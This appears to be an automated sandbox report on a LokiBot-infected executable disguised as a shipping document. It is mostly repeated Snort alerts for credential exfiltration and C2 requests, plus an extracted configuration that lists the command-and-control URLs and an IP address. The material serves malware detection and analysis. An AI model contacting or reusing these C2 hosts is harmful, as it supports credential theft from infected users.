Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:11.222525
SID:	2021641
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:42.568421
SID:	2021641
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:10.231973
SID:	2024313
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:39.921949
SID:	2024318
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:58.700835
SID:	2024317
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:39.921949
SID:	2024313
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:18.909479
SID:	2021641
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:58.700835
SID:	2024312
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:29.212593
SID:	2024318
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:53.510184
SID:	2021641
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:00.985732
SID:	2024313
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:00.985732
SID:	2024318
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:17.642261
SID:	2024318
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:29.212593
SID:	2024313
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:57.200454
SID:	2021641
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:21.643851
SID:	2024318
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:17.642261
SID:	2024313
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:47.218743
SID:	2021641
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:10.231973
SID:	2024318
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:06.504867
SID:	2021641
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:02.240601
SID:	2021641
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:29.915605
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:59.827008
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:45.849788
SID:	2024313
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:41.014214
SID:	2024318
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:21.173515
SID:	2021641
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:37.405098
SID:	2021641
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:45.849788
SID:	2024318
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:52.171897
SID:	2024313
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:48.680283
SID:	2024313
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:59.827008
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:48.680283
SID:	2024318
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:52.171897
SID:	2024318
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:13.935226
SID:	2024313
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:56.719260
SID:	2021641
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:30.405107
SID:	2021641
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:13.935226
SID:	2024318
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:21.643851
SID:	2024313
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=ee"]}

Machine Learning detection for sample

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Joe Sandbox ML: detected

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdbMZ source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Data.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Xml.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: Accessibility.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: UHN.pdbO source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Data.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Configuration.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: UHN.pdbSHA256Q source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
Source:	Binary string: System.Xml.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: UHN.pdb source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Drawing.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb< source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Data.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Core.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: Accessibility.pdbMZ source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Data.pdb, source: WER63DD.tmp.dmp.6.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER63DD.tmp.dmp.6.dr

Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

3_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49735 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49741 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49747 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49752 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49752 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49754 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49755 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49756 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49757 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49759 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49761 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49762 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49763 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49764 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49765 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49769 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49770 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49771 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49776 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49776 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49776 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49784 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49785 -> 45.77.223.48:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49785 -> 45.77.223.48:80
